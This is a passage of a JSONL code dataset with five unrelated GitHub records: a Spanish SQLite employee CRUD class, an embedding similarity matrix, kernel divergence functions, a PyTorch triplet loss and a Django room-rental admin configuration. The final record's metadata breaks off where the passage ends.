+{"seq_id": "20366125819", "text": "\"\"\"\r\nImplementación de las operaciones CRUD (Create - Read - Update - Delete)\r\nCon SQLite3\r\n\"\"\"\r\n\r\nimport sqlite3 as dbapi\r\nfrom os.path import isfile\r\nfrom base_datos_objetos import Empleado, Categoria, Producto\r\n\r\nclass BaseDatos:\r\n \"\"\"\r\n Representa la conexión a la base de datos y define las operaciones CRUD (Create - Read - Update - Delete)\r\n para una entidad\r\n \"\"\"\r\n\r\n def __init__(self, path):\r\n self.conexion=None\r\n self.cur = None\r\n\r\n if not isfile(path):\r\n raise ValueError('El '+path+' no existe...')\r\n\r\n else:\r\n self.conexion=dbapi.connect(path)\r\n self.cur = self.conexion.cursor()\r\n\r\n def create(self, empleado):\r\n \"\"\"\r\n Da de alta un empleado en la base de datos\r\n \"\"\"\r\n sql = \"insert into empleados(id,nombre, cargo) values(?,?,?)\"\r\n t = empleado.getTupla()\r\n return self.__actualizar(sql, t)\r\n\r\n def delete(self, id):\r\n \"\"\"\r\n Borra un empleado por clave primaria\r\n \"\"\"\r\n sql = \"delete from empleados where id=?\"\r\n t = (id,) \r\n return self.__actualizar(sql, t)\r\n\r\n def update(self, empleado):\r\n \"\"\"\r\n Actualiza un empleado de la base de datos\r\n \"\"\"\r\n sql = \"update empleados set nombre=?, cargo=? where id=?\"\r\n t = empleado.getTupla2()\r\n return self.__actualizar(sql, t)\r\n\r\n def __actualizar(self, sql, t):\r\n \"\"\"\r\n Ejecuta una consulta de acción dentro de una trasacción\r\n \"\"\"\r\n try:\r\n self.cur.execute(sql, t)\r\n n = self.cur.rowcount\r\n self.conexion.commit()\r\n return n\r\n\r\n except Exception as e:\r\n self.conexion.rollback()\r\n raise e\r\n\r\n def read(self, id):\r\n \"\"\"\r\n Devuelve un empleado de la base de datos\r\n \"\"\"\r\n sql = \"select * from empleados where id=?\"\r\n self.cur.execute(sql, (id,))\r\n t = self.cur.fetchone()\r\n if not t:\r\n raise ValueError('El id '+str(id)+ ' no existe en la base de datos')\r\n else:\r\n return Empleado(*t)\r\n\r\n def selectEmpleados(self, cargo=None):\r\n \"\"\"\r\n Devuelve una colección de objetos empleado\r\n \"\"\"\r\n empleados = []\r\n sql = \"select id,nombre,cargo from empleados\"\r\n if not cargo: \r\n self.cur.execute(sql)\r\n else:\r\n sql += \" where cargo like ?\"\r\n self.cur.execute(sql, (\"%\"+cargo+\"%\",))\r\n\r\n for t in self.cur.fetchall():\r\n empleado = Empleado(*t)\r\n empleados.append(empleado)\r\n return empleados\r\n\r\n def query(self, sql):\r\n self.cur.execute(sql)\r\n cabs = \";\".join([t[0] for t in self.cur.description])\r\n print(cabs)\r\n for t in self.cur.fetchall():\r\n linea = \";\".join([str(col) for col in t]) \r\n print(linea)\r\n\r\n def __del__(self):\r\n if self.cur: self.cur.close()\r\n if self.conexion: self.conexion.close()\r\n\r\nif __name__ == '__main__':\r\n try:\r\n bd = BaseDatos(\"../bd/empresa3.db\")\r\n #bd.query(\"select * from pedidos\")\r\n empleados = bd.selectEmpleados('ventas')\r\n for e in empleados:\r\n print(e)\r\n\r\n empleado = bd.read(4)\r\n print(empleado)\r\n empleado.cargo = \"Gerente de ventas\"\r\n bd.update(empleado)\r\n\r\n emp = bd.read(4)\r\n print(emp)\r\n\r\n #empleado = Empleado(50, \"Sandra Gonzalez\", \"Directivo de ventas\")\r\n #bd.create(empleado)\r\n\r\n \"\"\"\r\n if bd.delete(1):\r\n print('Registro borrado')\r\n else:\r\n print('No se ha podido eliminar')\r\n \"\"\"\r\n\r\n except Exception as e:\r\n print(e)\r\n", "repo_name": "aldebarran22/curso_santander_1", "sub_path": "codigo_feb_1/conexion_basedatos.py", "file_name": "conexion_basedatos.py", "file_ext": "py", "file_size_in_byte": 3782, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isfile", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 24, "usage_type": "call"}, {"api_name": "base_datos_objetos.Empleado", "line_number": 75, "usage_type": "call"}, {"api_name": "base_datos_objetos.Empleado", "line_number": 90, "usage_type": "call"}]}
+{"seq_id": "5457451761", "text": "from typing import Iterable, List, Tuple, NamedTuple, Union, Optional, Dict\n\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom . import Embeddings\n\n\nclass EmbeddingSimilarity(NamedTuple):\n rank: int\n word: str\n similarity: float\n vec: np.ndarray\n\n\nMostSimilarResult = List[EmbeddingSimilarity]\nWordOrVec = Union[str, np.ndarray]\n\n\nclass Matrix:\n \"\"\" Transforms a lookup-based Embeddings object into a classical embedding matrix by looking up a fixed vocabulary\n and storing the results. The matrix can then be used for distance measuring.\n \"\"\"\n\n def __init__(self, lookup_embeddings: Embeddings, vocab: Optional[Iterable[str]] = None,\n precomputed_word2ind: Optional[Dict[str, int]] = None, precomputed_matrix: Optional[np.ndarray] = None,\n verbose: bool = False) -> None:\n \"\"\" Initialize the Matrix object.\n\n :param lookup_embeddings: the embeddings object used for lookup\n :param vocab: an iterable containing the words that should be stored in the matrix\n :param precomputed_word2ind: a precomputed word2ind dict, e.g. from the fastText .vec file\n :param precomputed_matrix: a precomputed embedding matrix, e.g. from the fastText .vec file\n :param verbose: setting this to True will show a progress bar when first looking up embeddings as well as output\n means when computing distances\n \"\"\"\n self.verbose = verbose\n self.lookup_embeddings = lookup_embeddings\n\n if vocab is not None:\n self._init_from_vocab(lookup_embeddings, vocab=vocab)\n elif precomputed_word2ind is not None and precomputed_matrix is not None:\n self._init_from_word2ind_and_matrix(precomputed_word2ind, precomputed_matrix)\n else:\n raise ValueError('The Matrix needs to be initialized either with vocab or word2ind+matrix')\n\n def _init_from_vocab(self, lookup_embeddings, vocab):\n vocab = set(vocab)\n self.vocab_size = len(vocab)\n self.word2ind = {word: i for i, word in enumerate(vocab)}\n self.ind2word = {i: word for i, word in enumerate(vocab)}\n self.embedding_matrix = np.zeros((self.vocab_size, lookup_embeddings.size))\n self.is_norm = False\n\n items: Iterable[Tuple[str, int]] = self.word2ind.items()\n if self.verbose:\n items = tqdm(items, desc='Looking up embeddings')\n for word, ind in items:\n looked_up = lookup_embeddings.lookup(word)\n if np.count_nonzero(looked_up) > 0:\n self.embedding_matrix[ind] = looked_up\n else:\n # this shouldn't happen anymore\n raise RuntimeError(f'Embedding vector for {word} is all zeros')\n\n def _init_from_word2ind_and_matrix(self, word2ind, matrix):\n self.vocab_size = len(word2ind)\n self.word2ind = word2ind\n self.ind2word = {i: word for word, i in self.word2ind.items()}\n self.embedding_matrix = matrix\n self.is_norm = True\n\n def init_norms(self, force: bool = False) -> None:\n \"\"\" Initializes self.norms with pre-computed L2 normalized vectors for cosine distance computation.\n\n :param force: setting this to True will update the norms even if they were already computed\n :return: None\n \"\"\"\n if not self.is_norm or force:\n # noinspection PyAttributeOutsideInit\n self.embedding_matrix = self.embedding_matrix / np.sqrt((self.embedding_matrix ** 2).sum(-1))[\n ..., np.newaxis]\n self.is_norm = True\n\n def _most_similar_cosine_measurement(self, vec):\n self.init_norms()\n normalized_vec = vec / np.linalg.norm(vec)\n return np.dot(self.embedding_matrix, normalized_vec)\n\n def most_similar_cosine(self, word_or_vec: WordOrVec, n: int = 20) -> MostSimilarResult:\n \"\"\" Calculate the cosine distance of the input vector to all vectors in the embedding matrix and return the\n most similar ones.\n\n :param word_or_vec: the input word or vector\n :param n: the number of results to return, or None if all should be returned\n :return: a list of MostSimilarResult objects\n \"\"\"\n return self._generic_most_similar(word_or_vec, self._most_similar_cosine_measurement,\n higher_is_more_similar=True, n=n)\n\n def cosine_distance_rank(self, word_or_vec: WordOrVec, word):\n return self._generic_rank(word_or_vec, word, self._most_similar_cosine_measurement, higher_is_more_similar=True)\n\n def cosine_distance(self, vec: np.ndarray, word: str) -> float:\n \"\"\" Returns the cosine distance between an input word and vector.\n\n :param vec: the input vector\n :param word: the input word\n :return: a float between -1 and 1\n \"\"\"\n self.init_norms()\n normalized_vec = vec / np.linalg.norm(vec)\n return float(np.dot(self.embedding_matrix[self.word2ind[word]], normalized_vec))\n\n def most_similar_l2(self, word_or_vec: WordOrVec, n: int = 20) -> MostSimilarResult:\n \"\"\" Calculate the L2 norm distance of the input vector to all vectors in the embedding matrix and return the\n most similar ones.\n\n :param word_or_vec: the input word or vector\n :param n: the number of results to return, or None if all should be returned\n :return: a list of (word, distance) pairs, with lower distance meaning more similar\n \"\"\"\n\n def measurement(vec):\n distances = np.zeros(self.vocab_size)\n for i, emb in enumerate(self.embedding_matrix):\n distances[i] = np.linalg.norm(vec - emb)\n return distances\n\n return self._generic_most_similar(word_or_vec, measurement, higher_is_more_similar=False, n=n)\n\n def _lookup_if_needed(self, word_or_vec: WordOrVec) -> np.ndarray:\n if type(word_or_vec) == str:\n return self.lookup_embeddings.lookup(word_or_vec)\n else:\n return word_or_vec\n\n def _generic_most_similar(self, word_or_vec: WordOrVec, measurement, higher_is_more_similar, n: int = 20):\n self.init_norms()\n vec = self._lookup_if_needed(word_or_vec)\n distances = measurement(vec)\n assert len(distances) == len(self.embedding_matrix)\n if self.verbose:\n print('mean distance', np.mean(distances))\n\n distances_for_sorting = -distances if higher_is_more_similar else distances\n\n if n is None or n == len(self.embedding_matrix):\n sorted_most_similar_ind = np.argsort(distances_for_sorting)\n else:\n most_similar_ind = np.argpartition(distances_for_sorting, n)[:n]\n sorted_most_similar_ind = most_similar_ind[np.argsort(distances_for_sorting[most_similar_ind])]\n\n return [EmbeddingSimilarity(rank=rank,\n word=self.ind2word[ind],\n similarity=distances[ind],\n vec=self.embedding_matrix[ind])\n for rank, ind in enumerate(sorted_most_similar_ind, start=1)]\n\n def _generic_rank(self, word_or_vec: WordOrVec, word, measurement, higher_is_more_similar):\n self.init_norms()\n vec = self._lookup_if_needed(word_or_vec)\n distances = measurement(vec)\n distances = -distances if higher_is_more_similar else distances\n\n word_distance = distances[self.word2ind[word]]\n return np.count_nonzero(distances[distances < word_distance]) + 1\n", "repo_name": "maxfriedrich/deid-training-data", "sub_path": "deid/embeddings/matrix.py", "file_name": "matrix.py", "file_ext": "py", "file_size_in_byte": 7525, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.NamedTuple", "line_number": 9, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 13, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 17, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 52, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 55, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 112, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 127, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 132, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.argpartition", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 167, "usage_type": "call"}]}
+{"seq_id": "9922483230", "text": "import numpy as np\nimport scipy.stats as scs\nimport kernels as kl\n\n\n######## MMD ##########\n\ndef MMD(x,y,k):\n n = len(x)\n Kxx = np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Kyy = np.array([[k(y[i],y[j]) for i in range(n)] for j in range(n)])\n Kxy = np.array([[k(x[i],y[j]) for i in range(n)] for j in range(n)])\n A = 1/((n-1)*n) * (np.sum(Kxx) - np.sum(np.diag(Kxx)))\n C = 1/((n-1)*n) * (np.sum(Kyy) - np.sum(np.diag(Kyy)))\n B = 1/n**2* np.sum(Kxy)\n return A - B + C\n\n\n#gradient in x of MMD \ndef grad_MMD(x,y,k,dk):\n d = len(x[0])\n n = len(x)\n m = len(y)\n dKx = np.array([[dk(x[i],x[j]) for j in range(n)] for i in range(n)])\n dKx[:,:,0] = dKx[:,:,0] - np.diag(np.diag(dKx[:,:,0]))\n dKx[:,:,1] = dKx[:,:,1] - np.diag(np.diag(dKx[:,:,1]))\n dKy = np.array([[dk(x[i],y[j]) for j in range(m)] for i in range(n)])\n R = np.zeros((n,d))\n R[:,0] = 2/(n * (n-1)) * dKx[:,:,0] @ np.ones(n) - 2/m**2 * dKy[:,:,0] @ np.ones(m)\n R[:,1] = 2/(n * (n-1)) * dKx[:,:,1] @ np.ones(n) - 2/m**2 * dKy[:,:,1] @ np.ones(m)\n return R\n\n\n\ndef log_ou_0(t):\n t_log = np.zeros(len(t))\n for i in range(len(t)):\n if t[i] > 0:\n t_log[i] = np.log(t[i])\n return t_log\n\n\n\n\n####### KKL ########\n\n\ndef KKL(x,y,k,Packy):\n n = len(x)\n m = len(y)\n Kx = 1/n * np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Ky = Packy[0] #1/m * np.array([[k(y[i],y[j]) for i in range(m)] for j in range(m)])\n regx = 1e-9*np.eye(n)\n regy = 1e-9*np.eye(m)\n #Kx = Kx +regx\n #Ky = Ky+regy\n Lx,U = np.linalg.eig(Kx)\n U = np.real(U).transpose()\n Lx = np.real(Lx)\n Ly,V = Packy[1], Packy[2] #np.linalg.eig(Ky)\n #V = np.real(V).transpose()\n #Ly = np.real(Ly)\n Trxy = 0\n Kxy = np.array([[k(x[i],y[j]) for j in range(m)] for i in range(n)])\n Trxx = np.sum(Lx * log_ou_0(Lx))\n for s in range(n):\n for t in range(m):\n Trxy = Trxy + log_ou_0([Ly[t]])[0] / Ly[t] * (U[s] @ Kxy @ V[t])**2 \n Trxx = np.sum(Lx * log_ou_0(Lx))\n \n return Trxx - 1/(n*m) * Trxy\n\n#Wasserstein Gradient of KKL\ndef WGrad_KKL(w,x,y,k,dk,Packy):\n n = len(x)\n m = len(y)\n Kx = 1/n * np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Ky = Packy[0] #1/m * np.array([[k(y[i],y[j]) for i in range(m)] for j in range(m)])\n Lx,U = np.linalg.eig(Kx)\n U = U.transpose()\n Lx = np.real(Lx)\n Ly,V = Packy[1], Packy[2] #np.linalg.eig(Ky)\n #V = V.transpose()\n #Ly = np.real(Ly)\n Kwx = np.array([k(w,x[i]) for i in range(n)]).transpose()\n Kwy = np.array([k(w,y[j]) for j in range(m)]).transpose()\n DKx = np.array([dk(w,x[i]) for i in range(n)]).transpose()\n DKy = np.array([dk(w,y[j]) for j in range(m)]).transpose()\n Trwx = 0\n Trwy = 0 \n for s in range(n):\n Trwx = Trwx + log_ou_0([Lx[s]])[0] / Lx[s] * 2 * (U[s] @ Kwx)* (DKx @ U[s]) \n #print(U[s] @ (n * Kx) @ U[s])\n for t in range(m):\n Trwy = Trwy + log_ou_0([Ly[t]])[0] / Ly[t] * 2 * (V[t] @ Kwy)* (DKy @ V[t]) \n return 1/n * Trwx - 1/ m * Trwy\n \n \n \n \n\n\n######## Kernel density estimation ###############\n\n#base distribution sample\nx_tau = scs.multivariate_normal.rvs(np.zeros(2),np.identity(2),100) \n\n\ndef h(x,y,k):\n return np.mean(np.array([k(x,x_tau[i]) * k(y,x_tau[i]) * np.exp(np.linalg.norm(x_tau[i])) /(np.sqrt(2 * np.pi)) for i in range(len(x_tau))]))\n \n \n\ndef DE(x,k,y):\n n = len(x)\n return 1/n * np.sum(np.array([h(x[i],y,k) for i in range(n)]))\n\ndef KDE(x, y, k):\n n = len(x)\n Q = np.array([DE(x,k,x[i]) for i in range(n)])\n P = np.array([DE(y,k,x[i]) for i in range(n)])\n return 1/n * np.sum(np.log(Q) * Q - np.log(P) * Q)\n \n \n \n######### TRACE #######################\n\ndef K_trace(x,k):\n n = len(x)\n Kx = 1/n * np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Lambdx,_ = np.linalg.eig(Kx)\n return np.sum(Lambdx)\n \n\n\n", "repo_name": "cclementine25/KKL_div", "sub_path": "divergences.py", "file_name": "divergences.py", "file_ext": "py", "file_size_in_byte": 3976, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.real", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 79, "usage_type": "attribute"}, {"api_name": "numpy.real", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 88, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal.rvs", "line_number": 106, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 106, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 106, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.identity", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 132, "usage_type": "call"}]}
+{"seq_id": "40398025849", "text": "# -*- coding: utf-8 -*-\n\nimport math\n\nimport torch\n\nfrom ncc.criterions import NccCriterion\nfrom ncc.data.constants import EPS\nfrom ncc.utils.logging import metrics\n\n\nclass TripletCriterion(NccCriterion):\n def __init__(self, task, sentence_avg):\n super().__init__(task)\n self.sentence_avg = sentence_avg\n self.margin = self.task.args['optimization']['margin']\n\n def forward(self, model, sample, reduce=True):\n \"\"\"Compute the loss for the given sample.\n\n Returns a tuple with three elements:\n 1) the loss\n 2) the sample size, which is used as the denominator for the gradient\n 3) logging outputs to display while training\n \"\"\"\n net_output = model(**sample['net_input'])\n loss, _ = self.compute_loss(model, net_output, reduce=reduce)\n sample_size = sample['target'].size(0) if self.sentence_avg else sample['ntokens']\n logging_output = {\n 'loss': loss.data,\n 'ntokens': sample_size,\n 'nsentences': sample_size,\n 'sample_size': sample_size,\n }\n return loss, sample_size, logging_output\n\n def compute_loss(self, repr, equal_ids):\n distance = torch.norm(repr.unsqueeze(dim=0) - repr.unsqueeze(dim=1), dim=-1, p=1) # B x B\n max_pos_distance = (distance * equal_ids).max(dim=-1)[0]\n neg_filter = distance <= (max_pos_distance + self.margin).unsqueeze(dim=-1)\n pos_mask = equal_ids + torch.eye(*equal_ids.size()).type_as(distance)\n neg_filter = neg_filter * (1 - pos_mask)\n avg_neg_distance = (distance * neg_filter).sum(dim=-1) / (neg_filter.sum(dim=-1) + EPS)\n min_neg_distance = (distance + pos_mask * 99999).min(dim=-1)[0]\n pos_filter = (distance >= (min_neg_distance - self.margin).unsqueeze(dim=-1)).type_as(distance)\n pos_filter = pos_filter * equal_ids\n avg_pos_distance = (distance * pos_filter).sum(dim=-1) / (pos_filter.sum(dim=-1) + EPS)\n triplet_loss = 0.5 * torch.relu(avg_pos_distance - min_neg_distance + self.margin) + \\\n 0.5 * torch.relu(max_pos_distance - avg_neg_distance + self.margin)\n triplet_loss = triplet_loss.sum()\n return triplet_loss, None\n\n @staticmethod\n def reduce_metrics(logging_outputs) -> None:\n \"\"\"Aggregate logging outputs from data parallel training.\"\"\"\n loss_sum = sum(log.get('loss', 0) for log in logging_outputs)\n # ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)\n sample_size = sum(log.get('sample_size', 0) for log in logging_outputs)\n metrics.log_scalar('loss', loss_sum / sample_size / math.log(2), sample_size, round=3)\n\n @staticmethod\n def logging_outputs_can_be_summed() -> bool:\n \"\"\"\n Whether the logging outputs returned by `forward` can be summed\n across workers prior to calling `reduce_metrics`. Setting this\n to True will improves distributed training speed.\n \"\"\"\n return True\n", "repo_name": "CGCL-codes/naturalcc", "sub_path": "ncc/criterions/type_prediction/_triplet.py", "file_name": "_triplet.py", "file_ext": "py", "file_size_in_byte": 3002, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 220, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ncc.criterions.NccCriterion", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.norm", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 41, "usage_type": "call"}, {"api_name": "ncc.data.constants.EPS", "line_number": 43, "usage_type": "name"}, {"api_name": "ncc.data.constants.EPS", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.relu", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.relu", "line_number": 49, "usage_type": "call"}, {"api_name": "ncc.utils.logging.metrics.log_scalar", "line_number": 59, "usage_type": "call"}, {"api_name": "ncc.utils.logging.metrics", "line_number": 59, "usage_type": "name"}, {"api_name": "math.log", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "74549878889", "text": "from django.contrib import admin\nfrom django.utils.html import mark_safe\nfrom . import models\n\n\n@admin.register(models.RoomType, models.Facility, models.HouseRule, models.Amenity)\nclass ItemAdmin(admin.ModelAdmin):\n\n \"\"\" item Admin Definition \"\"\"\n\n list_display = (\"name\", \"used_by\")\n\n def used_by(self, obj):\n return obj.rooms.count()\n\n\n# https://docs.djangoproject.com/en/3.0/ref/contrib/admin/#django.contrib.admin.TabularInline\nclass PhotoInLine(admin.TabularInline):\n model = models.Photo\n\n\n# ↑ 와 같음 보이는방식이 다름\n# class PhotoInLine(admin.StackedInline):\n# model = models.Photo\n\n\n@admin.register(models.Room)\nclass RoomAdmin(admin.ModelAdmin):\n\n \"\"\" Room Admin Definition \"\"\"\n\n inlines = [\n PhotoInLine,\n ]\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/#django.contrib.admin.ModelAdmin.fieldsets\n fieldsets = (\n (\n \"Basic Info\",\n {\"fields\": (\"name\", \"description\", \"country\", \"city\", \"address\", \"price\")},\n ),\n (\"Times\", {\"fields\": (\"check_in\", \"check_out\", \"instant_book\",)},),\n (\"Spaces\", {\"fields\": (\"guests\", \"beds\", \"bedrooms\", \"baths\",)}),\n (\n \"More About the Space\",\n {\n \"classes\": (\"collapse\",),\n \"fields\": (\"amenities\", \"facilitys\", \"houserules\",),\n },\n ),\n (\"Last Details\", {\"fields\": (\"host\",)}),\n )\n\n ordering = (\"name\", \"price\", \"bedrooms\")\n\n list_display = (\n \"name\",\n \"country\",\n \"city\",\n \"price\",\n \"guests\",\n \"beds\",\n \"bedrooms\",\n \"baths\",\n \"check_in\",\n \"check_out\",\n \"instant_book\",\n \"count_amenities\",\n \"count_photos\",\n \"total_rating\",\n \"created\",\n )\n\n list_filter = (\n \"instant_book\",\n \"host__superhost\",\n \"room_type\",\n \"amenities\",\n \"facilitys\",\n \"houserules\",\n \"city\",\n \"country\",\n )\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/\n # ^ , = , @ 설명이 나와있음\n search_fields = (\"^city\", \"^host__username\")\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/\n # ManyToManyField 에만 적용가능\n filter_horizontal = (\n \"amenities\",\n \"facilitys\",\n \"houserules\",\n )\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/#django.contrib.admin.ModelAdmin.raw_id_fields\n raw_id_fields = (\"host\",)\n\n # https://docs.djangoproject.com/en/3.0/ref/contrib/admin/\n\n def save_model(self, request, obj, form, change):\n print(obj, form, change)\n super().save_model(request, obj, form, change)\n\n # obj == row\n def count_amenities(self, obj):\n return obj.amenities.count()\n\n def count_photos(self, obj):\n return obj.photos.count()\n\n def superuser(self, obj):\n return obj.host.superhost\n\n # 해당하는 column name 변경\n # count_amenities.short_description = \"hello sexy!\"\n count_photos.short_description = \"Photo_Count\"\n\n\n@admin.register(models.Photo)\nclass PhotoAdmin(admin.ModelAdmin):\n\n \"\"\" Photo Admin Difinition \"\"\"\n\n list_display = (\"__str__\", \"get_thumnail\")\n\n def get_thumnail(self, obj):\n # print(dir(obj.file))\n\n # mark_safe : django 의 각종 security 때문에 웹사이트가 javascript ,html 등\n # 각종 명령어를 읽지 못하게 막아놓은것을 풀어줌\n # ( django 에게 안전한 String 인것을 알림 )\n return mark_safe(f' ')\n\n get_thumnail.short_description = \"Thumnail\"\n\n", "repo_name": "gygy2006/airbnb-clone", "sub_path": "rooms/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 3663, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.contrib.admin.TabularInline", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 18, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 28, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 27, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 121, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 121, "usage_type": "name"}, {"api_name": "django.utils.html.mark_safe", "line_number": 133, "usage_type": "call"}, {"api_name": "django.contrib.admin.register", "line_number": 120, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 120, "usage_type": 